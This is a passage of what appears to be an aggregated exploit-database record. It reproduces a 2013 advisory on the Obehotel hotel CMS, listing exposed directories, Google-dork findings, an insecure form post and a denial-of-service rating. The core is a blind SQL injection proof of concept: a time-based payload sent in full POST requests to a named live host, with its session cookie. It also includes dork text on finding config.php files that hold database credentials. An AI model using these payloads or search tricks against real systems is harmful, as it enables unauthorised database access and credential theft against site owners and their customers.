\n/mpa/core/js/plugins/ckfinder/plugins/watermark \n/mpa/core/js/plugins/ckfinder/plugins/zip \n/mpa/core/js/plugins/ckfinder/plugins/zip/images \n/mpa/core/js/plugins/ckfinder/skins \n/mpa/core/js/plugins/ckfinder/skins/kama \n/mpa/core/js/plugins/ckfinder/skins/kama/images \n/mpa/core/js/plugins/ckfinder/skins/kama/images/icons \n/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16 \n/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32 \n/mpa/core/js/plugins/ckfinder/skins/kama/images/loaders \n/mpa/core/js/plugins/ckfinder/skins/kama/images/toolbar \n/mpa/core/js/plugins/ckfinder/skins/v1 \n/mpa/core/js/plugins/ckfinder/skins/v1/images \n/mpa/core/js/plugins/ckfinder/skins/v1/images/icons \n/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16 \n/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32 \n/mpa/core/js/plugins/ckfinder/skins/v1/images/loaders \n/mpa/core/js/plugins/ckfinder/skins/v1/images/toolbar \n/mpa/core/js/plugins/ckfinder/userfiles \n/mpa/core/js/plugins/tinymce \n/mpa/core/js/plugins/tinymce/langs \n/mpa/core/js/plugins/tinymce/plugins \n/mpa/core/js/plugins/tinymce/plugins/advhr \n/mpa/core/js/plugins/tinymce/plugins/advhr/css \n/mpa/core/js/plugins/tinymce/plugins/advhr/js \n/mpa/core/js/plugins/tinymce/plugins/advhr/langs \n/mpa/core/js/plugins/tinymce/plugins/advimage \n/mpa/core/js/plugins/tinymce/plugins/advimage/css \n/mpa/core/js/plugins/tinymce/plugins/advimage/img \n/mpa/core/js/plugins/tinymce/plugins/advimage/js \n/mpa/core/js/plugins/tinymce/plugins/advimage/langs \n/mpa/core/js/plugins/tinymce/plugins/advlink \n/mpa/core/js/plugins/tinymce/plugins/advlink/css \n/mpa/core/js/plugins/tinymce/plugins/advlink/js \n/mpa/core/js/plugins/tinymce/plugins/advlink/langs \n/mpa/core/js/plugins/tinymce/plugins/advlist \n/mpa/core/js/plugins/tinymce/plugins/autolink \n/mpa/core/js/plugins/tinymce/plugins/autoresize \n/mpa/core/js/plugins/tinymce/plugins/autosave \n/mpa/core/js/plugins/tinymce/plugins/autosave/langs \n/mpa/core/js/plugins/tinymce/plugins/bbcode \n/mpa/core/js/plugins/tinymce/plugins/contextmenu \n/mpa/core/js/plugins/tinymce/plugins/directionality \n/mpa/core/js/plugins/tinymce/plugins/emotions \n/mpa/core/js/plugins/tinymce/plugins/emotions/img \n/mpa/core/js/plugins/tinymce/plugins/emotions/js \n/mpa/core/js/plugins/tinymce/plugins/emotions/langs \n/mpa/core/js/plugins/tinymce/plugins/example \n/mpa/core/js/plugins/tinymce/plugins/example/img \n/mpa/core/js/plugins/tinymce/plugins/example/js \n/mpa/core/js/plugins/tinymce/plugins/example/langs \n/mpa/core/js/plugins/tinymce/plugins/example_dependency \n/mpa/core/js/plugins/tinymce/plugins/fullpage \n/mpa/core/js/plugins/tinymce/plugins/fullpage/css \n/mpa/core/js/plugins/tinymce/plugins/fullpage/js \n/mpa/core/js/plugins/tinymce/plugins/fullpage/langs \n/mpa/core/js/plugins/tinymce/plugins/fullscreen \n/mpa/core/js/plugins/tinymce/plugins/iespell \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2 \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2/img \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels \n/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels/img \n/mpa/core/js/plugins/tinymce/plugins/insertdatetime \n/mpa/core/js/plugins/tinymce/plugins/layer \n/mpa/core/js/plugins/tinymce/plugins/legacyoutput \n/mpa/core/js/plugins/tinymce/plugins/lists \n/mpa/core/js/plugins/tinymce/plugins/media \n/mpa/core/js/plugins/tinymce/plugins/media/css \n/mpa/core/js/plugins/tinymce/plugins/media/js \n/mpa/core/js/plugins/tinymce/plugins/media/langs \n/mpa/core/js/plugins/tinymce/plugins/nonbreaking \n/mpa/core/js/plugins/tinymce/plugins/noneditable \n/mpa/core/js/plugins/tinymce/plugins/pagebreak \n/mpa/core/js/plugins/tinymce/plugins/paste \n/mpa/core/js/plugins/tinymce/plugins/paste/js \n/mpa/core/js/plugins/tinymce/plugins/paste/langs \n/mpa/core/js/plugins/tinymce/plugins/preview \n/mpa/core/js/plugins/tinymce/plugins/preview/jscripts \n/mpa/core/js/plugins/tinymce/plugins/print \n/mpa/core/js/plugins/tinymce/plugins/save \n/mpa/core/js/plugins/tinymce/plugins/searchreplace \n/mpa/core/js/plugins/tinymce/plugins/searchreplace/css \n/mpa/core/js/plugins/tinymce/plugins/searchreplace/js \n/mpa/core/js/plugins/tinymce/plugins/searchreplace/langs \n/mpa/core/js/plugins/tinymce/plugins/spellchecker \n/mpa/core/js/plugins/tinymce/plugins/spellchecker/css \n/mpa/core/js/plugins/tinymce/plugins/spellchecker/img \n/mpa/core/js/plugins/tinymce/plugins/style \n/mpa/core/js/plugins/tinymce/plugins/style/css \n/mpa/core/js/plugins/tinymce/plugins/style/js \n/mpa/core/js/plugins/tinymce/plugins/style/langs \n/mpa/core/js/plugins/tinymce/plugins/tabfocus \n/mpa/core/js/plugins/tinymce/plugins/table \n/mpa/core/js/plugins/tinymce/plugins/table/css \n/mpa/core/js/plugins/tinymce/plugins/table/js \n/mpa/core/js/plugins/tinymce/plugins/table/langs \n/mpa/core/js/plugins/tinymce/plugins/template \n/mpa/core/js/plugins/tinymce/plugins/template/css \n/mpa/core/js/plugins/tinymce/plugins/template/js \n/mpa/core/js/plugins/tinymce/plugins/template/langs \n/mpa/core/js/plugins/tinymce/plugins/visualblocks \n/mpa/core/js/plugins/tinymce/plugins/visualblocks/css \n/mpa/core/js/plugins/tinymce/plugins/visualchars \n/mpa/core/js/plugins/tinymce/plugins/wordcount \n/mpa/core/js/plugins/tinymce/themes \n/mpa/core/js/plugins/tinymce/themes/advanced \n/mpa/core/js/plugins/tinymce/themes/advanced/img \n/mpa/core/js/plugins/tinymce/themes/advanced/js \n/mpa/core/js/plugins/tinymce/themes/advanced/langs \n/mpa/core/js/plugins/tinymce/themes/advanced/skins \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/default \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/default/img \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/highcontrast \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7 \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7/img \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels \n/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels/img \n/mpa/core/js/plugins/tinymce/themes/simple \n/mpa/core/js/plugins/tinymce/themes/simple/img \n/mpa/core/js/plugins/tinymce/themes/simple/langs \n/mpa/core/js/plugins/tinymce/themes/simple/skins \n/mpa/core/js/plugins/tinymce/themes/simple/skins/default \n/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7 \n/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7/img \n/mpa/core/js/plugins/tinymce/utils \n/mpa/core/lang \n/mpa/core/pdf \n \n \nFiles uploaded through FTP \n \nAffected items \n \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler \n/mpa/core/js/plugins/ckfinder/help/files/images \n/mpa/core/js/plugins/ckfinder/plugins \n/mpa/core/js/plugins/ckfinder/plugins/flashupload \n/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash \n \n \n \nMp3 file \n \n \nYes! I probably have should have told you guys earlier, \nbut this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... \n \na)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching \nb)a lot of the time google gives you results and they are not there thanks to good old friend 404 \nc)finding stuff takes a lot of practice. \n \nGoods... \n \na)ive found whole albums \nb)ive mass downloaded directories of hundreds of songs that i have intrest in \nc)its exciting seeing the results, like fining treasure. \n \nAffected items \n \n/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16 \n/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32 \n/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16 \n/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32 \n \n \n \nPHP configuration file (config.php) \n \n \nThis search brings up sites with \"config.php\" files. To skip the technical discussion, \nthis configuration file contains both a username and a password for an SQL database. \nMost sites with forums run a PHP message base. This file gives you the keys to that forum, \nincluding FULL ADMIN access to the database. Way to go, googleDorks!! \n \nAffected items \n \n/mpa/core/js/plugins/ckfinder \n/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core \n \n \nInsecure transition from HTTPS to HTTP in form post \n*************************************************** \nThis secure (https) page contains a form that is posting to an insecure (http) page. \nThis could confuse users who may think their data is encrypted when in fact it's not. \n \nThis vulnerability affects \n \n/mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html. \n \nAttack details \n-------------- \n \nForm name: \"\" \n \nForm action: \"http://cksource.com/ckfinder/doc_suggestion\" \n \nGET /mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html \n \nReferer: https://secureadv.obehotel.com/mpa/core/js/plugins/ckfinder/help/es/files/toc.html \n \nCookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3 \n \nHost: secureadv.obehotel.com \n \nConnection: Keep-alive \n \nAccept-Encoding: gzip,deflate \n \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) \n \nAccept: */* \n \nResponse: \n \nServer: Apache/2.2.16 (Debian) \nLast-Modified: Fri, 24 Aug 2012 02:49:24 GMT \n \nETag: \"30119b-696-4c7fa060b5500\" \n \nAccept-Ranges: bytes \nVary: Accept-Encoding \nContent-Length: 1686 \nKeep-Alive: timeout=15, max=29 \nConnection: Keep-Alive \nContent-Type: text/html; charset=ISO-8859-15 \n \n \nIV. CREDITS \n------------------------- \n \nThis vulnerability has been discovered \nby Juan Carlos Garc\u00eda(@secnight) \n \nSpecial thanks to Javier Garcia Garcia for showing me this Spanish \"CMS\" for Penetration Testing \n \nV. LEGAL NOTICES \n------------------------- \n \nThe Author accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122962/obehotel-sqldosinsecure.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-06T05:14:16", "bulletinFamily": "exploit", "description": "Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.", "modified": "2013-08-27T00:00:00", "published": "2013-08-27T00:00:00", "id": "1337DAY-ID-21170", "href": "https://0day.today/exploit/description/21170", "type": "zdt", "title": "Obehotel CMS SQL Injection Vulnerability", "sourceData": "OBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\nI-VULNERABILITY\r\n-------------------------\r\n\r\n#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\n#Vendor:https://secureadv.obehotel.com/mpa/\r\n\r\n#Author:Juan Carlos Garc\u00eda (@secnight)\r\n\r\n#Follow me \r\n\r\n http://www.highsec.es\r\n http://hackingmadrid.blogspot.com\r\nTwitter:@secnight\r\n\r\n\r\n\r\nII-Introduction:\r\n================\r\n\r\nObehotel is the set of different solutions, technological developments and applications directed\r\nto hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience.\r\n\r\nObehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector\r\nEfimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner.\r\n\r\nThis union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry.\r\n\r\n-------------------------\r\n\r\nIII-PROOF OF CONCEPT\r\n====================\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nBlind SqlInjection\r\n******************\r\n\r\nSQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.\r\n\r\nAn SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't\r\nproperly filter out dangerous characters. \r\n\r\nAn attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. \r\n\r\nDepending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.\r\n\r\nIt may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases,\r\nit may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.\r\n\r\nCertain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). \r\n\r\nIf an attacker can obtain access to these procedures it may be possible to compromise the entire machine.\r\n\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nURL encoded POST input username was set to\r\n\r\nxlgskuot' or (sleep(2)+1) limit 1 -- \r\n\r\nPOST /mpa/index.php \r\n\r\n\r\nServer: Apache/2.2.16 (Debian)\r\nX-Powered-By: PHP/5.3.3-7+squeeze14\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./hotel_inicio/index.php\r\nVary: Accept-Encoding\r\nContent-Length: 3402\r\nKeep-Alive: timeout=15, max=92\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=utf-8\r\n\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\r\n\r\nvariant (1)\r\n\r\nname\r\n\r\nPOST /mpa/index.php HTTP/1.1\r\nContent-Length: 92\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3\r\nHost: secureadv.obehotel.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\nAccept: */*\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21170"}]}
